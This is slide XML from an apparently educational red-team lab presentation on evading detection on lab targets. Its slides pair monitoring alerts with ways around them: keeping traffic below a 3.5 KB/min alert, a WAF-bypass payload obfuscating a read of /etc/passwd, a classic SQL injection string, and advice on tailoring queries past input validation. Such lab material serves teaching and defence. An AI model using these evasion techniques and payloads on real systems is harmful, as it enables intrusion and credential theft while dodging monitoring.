            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Monitoring Overview</a:t>
            </a:r>
            <a:endParaRPr sz="4400">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400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>An “HTTP Request Size Monitor” alert shows the amount of data being transferred from all documents.</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-501650" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This alert is triggered when the sum of data from HTTP requests is &gt; 3.5 KB over the past minute.</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-508000" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHEN sum() of http.request.bytes over ALL DOCUMENTS is ABOVE 3500 FOR THE LAST 1 minute</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mitigating Detection</a:t>
            </a:r>
            <a:endParaRPr sz="4400" b="1">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400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Keep data transfer rates below 3.5 KB/min to avoid this particular threshold.</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gf9c6693cea_2_79"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32725" y="204000"/>
            <a:ext cx="24443100" cy="24480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Stealth Exploitation:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="6400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Command Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2537" name="Google Shape;2537;gf9c6693cea_2_7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26</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2538" name="Google Shape;2538;gf9c6693cea_2_79"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="22942800"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endParaRPr sz="3600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Monitoring Overview</a:t>
            </a:r>
            <a:endParaRPr sz="4400" dirty="0">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400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A Web Application Firewall acts as the IDS/IPS for Layer 7 Application security, and filters incoming traffic based on special characters and phrases</a:t>
            </a:r>
            <a:endParaRPr sz="4000" dirty="0">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400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>They filter incoming traffic based on special characters like ‘/’ and ‘?’ or ‘passwd’</a:t>
            </a:r>
            <a:endParaRPr sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The HTTP requests containing filtered content will be dropped or blocked.</a:t>
            </a:r>
            <a:endParaRPr sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mitigating Detection</a:t>
            </a:r>
            <a:endParaRPr sz="4400" b="1" dirty="0">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400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This can be bypassed by using uninitialized variables in PHP code.</a:t>
            </a:r>
            <a:endParaRPr sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-508000" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cd%20/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pass$uwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> would bypass the filtered ‘passwd’ rule, and a connection could still be made.</a:t>
            </a:r>
            <a:endParaRPr sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4400" dirty="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20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32725" y="204000"/>
            <a:ext cx="24443100" cy="24480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SQL Database Exploitation:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="6400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Improper Access Control</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2544" name="Google Shape;2544;p2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27</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2545" name="Google Shape;2545;p20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717425" y="2257975"/>
            <a:ext cx="22942800" cy="103728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endParaRPr sz="3600" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3400" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Monitoring Overview</a:t>
            </a:r>
            <a:endParaRPr sz="3400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-387350" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Which method thwarts this exploitation? Input Validation utilizing stored procedures that perform data validation.</a:t>
            </a:r>
            <a:endParaRPr sz="3300">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-387350" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What is the methodology behind this method? Stored Procedure measure the validity of data by accepting data as a parameter and comparing it to stored procedures that have been dubbed non-malicious.</a:t>
            </a:r>
            <a:endParaRPr sz="3300">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-387350" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Which threshold does it fire at? Stored Procedures fire at 1 and immediately associate the string as malicious due to the execution of certain statements within a SQL database resulting in the retrieval of confidential data. Ex: ‘ or ‘1’=’1’</a:t>
            </a:r>
            <a:endParaRPr sz="3300">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="3300">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3300" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mitigating Detection</a:t>
            </a:r>
            <a:endParaRPr sz="3300" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-387350" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How can you execute the same exploit ? Narrow tailor the statement that you are querying the database so that the stored procedure has not previously been introduced to it and deemed it as malicious</a:t>
            </a:r>
            <a:endParaRPr sz="3300">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-387350" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Are there alternative exploits that may perform better? An alternative to narrowly tailoring the statement is to perform reconnaissance on the input validation that the SQL database is employing. Through this common defects in validation and canonicalization mechanisms can be detected. </a:t>
            </a:r>
            <a:endParaRPr sz="3300">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="3400"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pic>
        <p:nvPicPr>
          <p:cNvPr id="2337" name="Google Shape;2337;p3"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="731334" y="773067"/>
            <a:ext cx="22914824" cy="12246448"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2338" name="Google Shape;2338;p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t>3</a:t>
            </a:fld>
            <a:endParaRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2339" name="Google Shape;2339;p3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731343" y="4936267"/>
            <a:ext cx="22914900" cy="2745600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="243750" tIns="243750" rIns="243750" bIns="243750"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US">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp; Critical Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="9600"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2340" name="Google Shape;2340;p3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-87421" y="34962844"/>
            <a:ext cx="56659498" cy="1612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4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="307587" y="2427933"/>
            <a:ext cx="17860800" cy="10393500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1D8BE6">
              <a:alpha val="14509"/>
            </a:srgbClr>
          </a:solid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endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2346" name="Google Shape;2346;p4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18480203" y="2427933"/>
            <a:ext cx="5364536" cy="10021976"/>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p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" u="sng">
                <a:latin typeface="Roboto Black"/>
                <a:ea typeface="Roboto Black"/>
                <a:cs typeface="Roboto Black"/>
                <a:sym typeface="Roboto Black"/>
              </a:rPr>
              <a:t>Network</a:t>
            </a:r>
            <a:endParaRPr sz="3200" b="1" u="sng">
              <a:latin typeface="Roboto Black"/>
              <a:ea typeface="Roboto Black"/>
              <a:cs typeface="Roboto Black"/>
              <a:sym typeface="Roboto Black"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Address Range: 192.168.1.0/24</a:t>
            </a:r>
            <a:endParaRPr sz="24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r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Netmask: 255.255.255.0</a:t>
            </a:r>
            <a:endParaRPr sz="24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r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Gateway: 10.0.0.1</a:t>
            </a:r>
            <a:endParaRPr sz="24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endParaRPr sz="11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r>
              <a:rPr lang="en-US" sz="3200" b="1" u="sng">
                <a:latin typeface="Roboto Black"/>
                <a:ea typeface="Roboto Black"/>
                <a:cs typeface="Roboto Black"/>
                <a:sym typeface="Roboto Black"/>
              </a:rPr>
              <a:t>Machines</a:t>
            </a:r>
            <a:endParaRPr sz="3200" b="1" u="sng">
              <a:latin typeface="Roboto Black"/>
              <a:ea typeface="Roboto Black"/>
              <a:cs typeface="Roboto Black"/>
              <a:sym typeface="Roboto Black"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Hostname: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" u="sng">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Target1</a:t>
            </a:r>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IPv4: 192.168.1.110</a:t>
            </a:r>
            <a:endParaRPr sz="28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OS: Linux</a:t>
            </a:r>
            <a:endParaRPr sz="28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endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Hostname: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" u="sng">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Target2</a:t>
            </a:r>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IPv4: 192.168.1.115</a:t>
            </a:r>
            <a:endParaRPr sz="28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OS: Linux</a:t>
            </a:r>
            <a:endParaRPr sz="28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endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
